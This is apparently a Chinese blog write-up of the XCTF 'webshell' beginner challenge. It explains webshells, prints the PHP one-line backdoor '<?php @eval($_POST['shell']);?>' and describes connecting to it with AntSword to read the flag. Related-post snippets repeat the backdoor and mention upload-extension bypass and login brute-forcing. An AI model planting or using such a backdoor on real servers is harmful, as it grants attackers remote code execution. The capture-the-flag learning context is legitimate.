xctf-webshell

最新推荐文章于 2022-08-01 18:06:12 发布
原创 最新推荐文章于 2022-08-01 18:06:12 发布 · 428 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #php #运维

本文介绍了webshell的概念及其在网站和服务器管理中的应用,并详细解释了一句话木马的工作原理及如何使用蚁剑工具进行连接和文件查看。

打开网页界面如下:

 百度一下什么是webshell

       webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

       顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作命令。webshell主要用于网站和服务器管理,由于其便利性和功能强大,被特别修改后的webshell也被部分人当作网站后门工具使用。

<?php @eval($_POST['shell']);?>就是一句话木马,此网页已被注入了一句话木马,可以通过蚁剑,菜刀等工具连接网站查看网页的文件。我使用的是蚁剑,步骤如下:

打开蚁剑,右击添加数据,输入网站url和密码:

 测试连接;

 连接成功添加,在数据管理中直接点开网页地址就可以查看网页文件,如下:

 看到flag.txt文件打开得到flag。

涉及知识

webshell

一句话木马

蚁剑使用

xctf-upload1
x1871329637的博客
09-01 922
只能上传图片,写一句话木马,通过burp抓包修改后缀上传。将shell.jpg后缀改为php同时也拿到了目录。修改后缀为jpg抓包上传。
adworld.xctf-web-新手练习区刷题
BROTHERYY的博客
05-07 1221
1.View Source 根据题目,就能猜到,此处是查看页面源码,在查看的过程中发现右键不能使用了,那就用F12吧~ 2.Robots 这题是考察Robots协议,访问的时候页面是一片空白,直接输入robots.txt 在地址栏输入robots.txt会得到f1ag_1s_h3re.php,尝试直接访问这个php文件。 3.Backup 对常用的备份文件名进行测试*.php~ or ...
xctfwebshell
recordliu的博客
01-28 437
这里一句话木马已经上传了 我们选择用菜刀来访问,菜刀可以去ctf工具下载。 右键,添加,然后把地址输入进去,类型选择php,添加 然后双击进入添加的,查看文件有flag,选择双击, flag出现, ...
XCTF WEB webshell
无限迭代中......
06-30 1831
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 题解:修改HTML代码提交一个shell的变量 变量值是webshell命令 ​​​​​​​<form action="http://111.198.29.45:36317/index.php" meth...
11.XCTF webshell
山兔的博客
09-16 389
小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 一打开网站,就看到 你会使用webshell吗? <?php @eval($_POST['shell']);?> 这不就是一句话连接吗, http://111.200.241.244:62328/index.php 连接成功,获得flag。 ...
XCTF (新手练习) Wed 之 webshell
qq_43230425的博客
09-22 553
webshell 题目如下图: 附上题目链接:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070&page=1   这道题主要在于解题工具的准备,解题步骤很简单。工具可以用中国菜刀或者中国蚁剑,但是中国菜刀很容易下载到开有后门的恶意软件,故我用的是中国蚁剑。 (下载链接:中国蚁剑;下载和使用说明) 工具准备好之后,以下为解题步骤: 第一步: 打开蚁剑后直接在空白处右键点击“添加
XCTF-web-新手区题目
Lorezon的博客
11-04 1070
自我总结用 一:view_source 一般都是先看源码。 自己就出来了。 二:get_post 用hackbar 继续 完成。 三:robots 进去发现空白,什么都没有。根据题目robots,那就来查看robots协议: 再访问 f1ag_1s_h3re.php 完成。 四:backup 先来看常见的文件名后缀:常见的备份文件后缀名有.git、.svn、.swp、.~、.bak、.bash_...
攻防世界XCTF—web入门题知识点、进阶提高题Writeup
AugenStern的博客
08-21 1242
WriteUpXCTF-Web新手入门区view_sourceget_postrobotsbackupcookiedisabled buttonsimple jsxff refererweak authwebshellcommand executionsimple_php高手进阶区 XCTF-Web 2016 年全国大学生信息安全竞赛开始设立创新实践技能赛,采取的就是传统的 CTF 赛制。在《2016年全国大学生信息安全竞赛参赛指南》中主办方给出的竞赛内容相对全面,值得参考。 系统安全。 涉及操作系统和
xctf攻防世界 Web高手进阶区 webshell
l8947943的博客
08-01 8950
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。...
XCTF攻防世界web新手练习_ 8_webshell
silence1_的博客
04-29 1万+
XCTF攻防世界web新手练习—webshell 题目 题目为webshell,描述中,重点:把它放在了index.php打开题目,你会使用webshell吗?并写出了一句话,从中很容易看出这个一句话的密码是" shell " 顺理成章,打开菜刀,添加,输入url,输如密码,连接成功, 一气呵成! 菜刀连接成功后可以直接对服务器文件进行操作,看到flag.txt,打开获得flag! ...
XCTF Web 新手区010: webshell
立志成为最会敲代码的dancer,最会locking的程序猿
04-01 708
题目: WP: 观察一下页面,一句话内容,密码为shell 直接用中国菜刀跑一下 打开flag.txt文件 成功
攻防世界XCTF:web新手练习区⑩/webshell
其名为碰
11-09 1236
题目 解题 1.进入看到显示 然后我们可以得到这个一句话的密码是shell 2.使用蚁剑 1)右键单击空白处添加数据 2)输入地址和密码连接 连接成功 看到FLAG,打开flag.txt 得到FLAG ...
XCTF-WEB
qq_43661408的博客
06-22 581
post和get 题目链接:http://111.198.29.45:34348/ 解题思路 首先使用 get方式提交变量a等于1 即 http://111.198.29.45:34348/?a=1 得到 第二条信息 需要使用post提交一个变量b值为2 因此使用火狐自带的插件hackbar,但是现在火狐更新后不能使用了,替代hackbar的插件有了 Max hackbar 和 hackbar q...
XCTF 攻防世界】WEB 新手练习区 webshell
weixin_45844670的博客
08-09 958
题目链接:https://adworld.xctf.org.cn/task/task_list?type=web&number=3&grade=0&page=1 首先,我们需要知道什么是webshell webshell(分类为远程访问木马)是作为一个基于网络的实现的网络安全威胁shell概念。 Webshell可以上传到Web服务器,以允许远程访问Web服务器,例如Web服务器的文件系统。 Webshell的独特之处在于它使用户能够通过充当命令行界面的Web浏览器访问Web服务器
XCTF攻防世界web新手练习_ 7_weak_auth
silence1_的博客
04-28 2万+
XCTF攻防世界web新手练习—weak_auth 题目 题目为weak_auth,描述信息,重点:随手就设了一个密码 进入题目,看到需要登录,随便输入一个用户名和密码试试 弹出弹窗提示用admin账户登录 于是用确定用户名为admin F12看看源码,提示需要一个字典,意思是要进行爆破 于是用burp进行爆破,当密码为123456时返回长度不同 查看此时返回响应得到flag! 关于弱...
攻防世界web入门-webshell write up
m0_62851980的博客
03-29 638
题目描述:小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。 这题重点在于对木马格式的了解和蚁剑的使用 打开网页页面只有一句话: 你会使用webshell吗? <?php @eval($_POST['shell']);?> 先来稍微了解一下木马:在php语言中,最简单的一句话木马语言为 : <?php @eval($_POST['attack']);?> 这句话中eval()函数表示括号内的语句字符串什么的全都当做代码执行,@表示后面..
Webshell管理工具
热门推荐
weixin_59872639的博客
01-15 2万+
中国蚁剑 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。 中国蚁剑的核心功能 Shell代理功能 Shell管理 文件管理 虚拟终端 数据库管理 插件市场 插件开发 中国蚁剑的简单使用 环境需求 windows攻击机,装有蚁剑 windows靶机,有phpstudy环境 步骤1:写一个简单的一句话木马 <?php @eval($_POST['123456'])
腾讯云轻量WebShell系列:(一)基础使用
weixin_37758297的博客
07-04 1529
SSH是连接云服务器的基础。腾讯云的WebShell作为轻量应用服务器的工具,具有和轻量应用服务器同样的特点——易上手、功能多。
XCTF-WEB进阶-fakebook
最新发布
02-28
### XCTF WEB进阶 Fakebook 解题报告 #### 源码分析 Fakebook 类似于社交网络平台,在此环境中存在多个功能模块,包括但不限于用户注册、登录以及个人信息管理等功能。通过查看源代码发现,该应用可能存在多种安全漏洞。 对于假想的 `fakebook` 平台而言,其核心逻辑通常围绕着用户的会话管理和数据交互展开。假设存在如下简化版 PHP 伪代码表示部分关键业务流程: ```php <?php class User { public $username; public $password; function login($input_username, $input_password){ // 存在一个潜在的安全隐患:未对输入做严格验证 if ($this->username === $input_username && md5($input_password) === $this->password){ $_SESSION['logged_in'] = true; return "Login successful"; } return "Invalid credentials"; } } ?> ``` 上述代码片段展示了用户认证过程中可能存在的安全隐患——使用弱哈希算法 MD5 对密码进行了处理[^1]。 #### 安全问题剖析 基于以上描述可以推测出几个主要攻击面: - **弱哈希函数**:MD5 已经被证明不再适合用于保护敏感信息,因为它容易受到碰撞攻击的影响。 - **缺乏输入过滤机制**:未能有效防止恶意字符进入系统内部,这可能导致 SQL 注入或其他类型的注入攻击发生。 - **不恰当的错误消息返回**:当用户名或密码错误时给出的具体提示可能会帮助攻击者缩小猜测范围。 #### 利用技巧 针对这些弱点,参赛选手可以从以下几个方面入手尝试突破并解决问题: - 尝试暴力破解或者彩虹表查找已知 MD5 值对应的原始字符串; - 测试是否存在其他形式的数据注入风险点,比如 URL 参数、POST 请求体内的字段等位置; - 探索是否有任何地方暴露出过多调试信息给外部访问者利用; 成功完成挑战后一般可以获得 flag 或者进一步的操作权限作为奖励。 #### 复现过程 为了模拟真实的渗透测试场景,建议按照以下方式构建实验环境来进行练习: 1. 构建一个类似的 Web 应用程序框架,确保其中包含了所有必要的组件和服务依赖关系; 2. 实施相应的防护措施来抵御常见的Web 攻击手段,如 XSS 和 CSRF 等; 3. 使用工具辅助自动化执行某些特定任务,例如 Hydra 可以用来实施字典攻击尝试登陆接口; 4. 记录每一步操作细节以便后续总结经验教训,并分享给社区成员共同学习进步。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值